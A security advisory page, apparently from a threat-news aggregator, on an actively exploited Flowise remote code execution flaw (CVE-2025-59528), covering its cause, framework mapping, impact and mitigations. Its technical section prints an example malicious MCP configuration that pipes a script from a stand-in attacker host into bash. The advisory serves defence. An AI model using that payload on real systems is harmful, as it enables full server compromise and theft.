LIVE THREATS
HIGH Python Supply-Chain Compromise // HIGH Over 1,000 Exposed ComfyUI Instances Targeted in Cryptomining Botnet Campaign // HIGH Google's Vertex AI Is Over-Privileged. That's a Problem // CRITICAL Flowise AI Agent Builder Under Active CVSS 10.0 RCE Exploitation; 12,000+ Instances … // CRITICAL How We Broke Top AI Agent Benchmarks: And What Comes Next // LOW Anthropic Claude Mythos Preview: The More Capable AI Becomes, the More Security It Needs // CRITICAL US summons bank bosses over cyber risks from Anthropic's latest AI model // HIGH Can Anthropic Keep Its Exploit-Writing AI Out of the Wrong Hands? // HIGH Browser Extensions Are the New AI Consumption Channel That No One Is Talking About // HIGH Process Manager for Autonomous AI Agents //
ATLAS OWASP CRITICAL Agentic AI LLM Security Supply Chain Industry News RELEVANCE ▲ 9.4

Flowise AI Agent Builder Under Active CVSS 10.0 RCE Exploitation; 12,000+ Instances Exposed

A maximum-severity (CVSS 10.0) remote code execution vulnerability in Flowise, a widely-used open-source AI agent builder, is under active exploitation with over 12,000 internet-exposed instances at risk. The flaw, CVE-2025-59528, exists in the CustomMCP node and allows unauthenticated JavaScript execution with full Node.js runtime privileges via unsanitised MCP server configuration input. This marks the third Flowise vulnerability exploited in the wild, underscoring systemic security gaps in AI orchestration and agent-building platforms.

SOURCE The Hacker News ↗
LOWHIGHAGENTIC AIFlowise AI Agent Builder Under Active CVSS10.0 RCE Exploitation; 12,000+ Instances Exposed…CRITICALTHE HACKER NEWS9.4GRID THE GREY

Overview

A critical remote code execution (RCE) vulnerability in Flowise — a popular open-source platform for building AI agents and LLM workflows — is being actively exploited in the wild. CVE-2025-59528 carries a maximum CVSS score of 10.0 and affects the platform’s CustomMCP node, which handles configuration for Model Context Protocol (MCP) server connections. With more than 12,000 internet-facing Flowise instances exposed, the attack surface is substantial. This is the third Flowise vulnerability to be exploited in the wild, following CVE-2025-8943 (CVSS 9.8) and CVE-2025-26319 (CVSS 8.9).

Technical Analysis

The vulnerability resides in the CustomMCP node’s handling of the mcpServerConfig input string. Flowise parses this user-supplied configuration to build the MCP server connection parameters. Critically, during this parsing process, the platform executes embedded JavaScript code without any security validation or sandboxing.

Because Flowise operates with full Node.js runtime privileges, a malicious actor can inject arbitrary JavaScript referencing dangerous built-in modules:

// Example of malicious mcpServerConfig payload
{
  "command": "node",
  "args": ["-e", "require('child_process').exec('curl http://attacker.com/shell.sh | bash')"]
}

This grants attackers access to child_process (arbitrary OS command execution) and fs (full file system read/write). Exploitation requires only a valid API token, lowering the barrier considerably. VulnCheck has attributed current exploitation activity to a single Starlink IP address, suggesting opportunistic scanning and exploitation at scale.

Framework Mapping

MITRE ATLAS:

  • AML.T0047 – ML-Enabled Product or Service: Flowise is a production AI orchestration platform; compromise affects downstream AI pipelines and agent behaviour.
  • AML.T0040 – ML Model Inference API Access: Attacker gains server-level access through the AI platform’s API surface.
  • AML.T0010 – ML Supply Chain Compromise: Unpatched Flowise instances embedded in enterprise AI stacks represent a supply chain risk vector.

OWASP LLM Top 10:

  • LLM07 – Insecure Plugin Design: The CustomMCP node acts as a plugin/tool with no input sanitisation or code execution controls.
  • LLM08 – Excessive Agency: The platform executes code with full system privileges, far exceeding necessary operational scope.
  • LLM05 – Supply Chain Vulnerabilities: Third-party AI infrastructure components with unpatched critical flaws introduce systemic risk.
  • LLM06 – Sensitive Information Disclosure: Successful exploitation enables exfiltration of credentials, model configurations, and customer data.

Impact Assessment

The 12,000+ exposed instances represent a broad attack surface spanning enterprises, startups, and research institutions using Flowise for production AI agent workflows. A successful exploit yields full server compromise, enabling lateral movement, data exfiltration, ransomware deployment, or persistent backdoor installation. The vulnerability has been public for over six months since the September 2025 advisory, meaning any unpatched instance has had prolonged exposure. Large corporations using Flowise as part of their AI infrastructure face significant business continuity and data protection risks.

Mitigation & Recommendations

  1. Patch immediately: Upgrade to Flowise npm package version 3.0.6 or later, which addresses CVE-2025-59528.
  2. Restrict internet exposure: Remove Flowise instances from public internet access; place behind VPN or zero-trust network access controls.
  3. Audit API token usage: Rotate all API tokens and review access logs for anomalous activity originating from unknown IP addresses.
  4. Monitor for indicators: Watch for unexpected outbound connections, unusual child_process activity, or file system modifications on Flowise host systems.
  5. Inventory AI infrastructure: Conduct a full audit of AI orchestration tools (Flowise, LangChain, etc.) across the stack to identify additional exposure.
  6. Apply defence-in-depth: Sandbox or containerise AI agent platforms with least-privilege OS configurations to limit blast radius from future exploits.

References